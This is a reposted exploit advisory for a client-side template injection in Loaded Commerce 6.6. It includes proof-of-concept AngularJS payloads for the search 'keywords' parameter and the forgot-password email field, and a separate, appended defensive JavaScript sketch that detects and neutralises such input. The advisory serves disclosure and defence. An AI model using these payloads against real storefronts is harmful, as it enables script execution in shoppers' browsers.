## https://sploitus.com/exploit?id=PACKETSTORM:189805
# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection (CSTI) (AngularJS)
    # Date: 03/13/2025
    # Exploit Author: tmrswrr
    # Vendor Homepage: https://loadedcommerce.com/
    # Version: 6.6
    # Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce
    
    Injecting {{7*7}} into the search parameter 
    https://target/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}
    returns 49, confirming a template injection vulnerability.
    
    Forgot Password:
    Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page
    https://target/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process
    triggers an alert, demonstrating client-side code execution.
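
A defensive sketch for the two inputs described above, added here and not taken from the advisory or from Loaded Commerce: it flags request parameters that carry AngularJS interpolation delimiters (including double-encoded ones) and renders a reflected value inside `ng-non-bindable`. The function names and sample inputs are assumptions constructed for illustration.

```javascript
// Added example, not Loaded Commerce code. Parameter names are the ones in the
// advisory; function names are hypothetical and sample inputs are constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Decode repeatedly (bounded) so double-encoded input such as %257B%257B is seen too.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch {
      break; // malformed %-sequence: keep what we have
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Return the names of parameters whose decoded value contains an AngularJS
// interpolation pair ({{ ... }}). Accepts a query string or a form body.
function findInterpolation(encodedParams) {
  const hits = [];
  for (const [name, value] of new URLSearchParams(encodedParams)) {
    if (/\{\{[\s\S]*?\}\}/.test(fullyDecode(value))) hits.push(name);
  }
  return hits;
}

// Output side. HTML-escaping alone does not stop interpolation, because
// AngularJS compiles text nodes after the browser has parsed them, so the
// escaped value is also wrapped in ng-non-bindable to exclude it from compilation.
function renderReflected(value) {
  const escaped = String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
  return `<span ng-non-bindable>${escaped}</span>`;
}

console.log(findInterpolation('rt=core%2Fadvanced_search_result&keywords={{7*7}}'));
console.log(renderReflected('{{7*7}}'));
```
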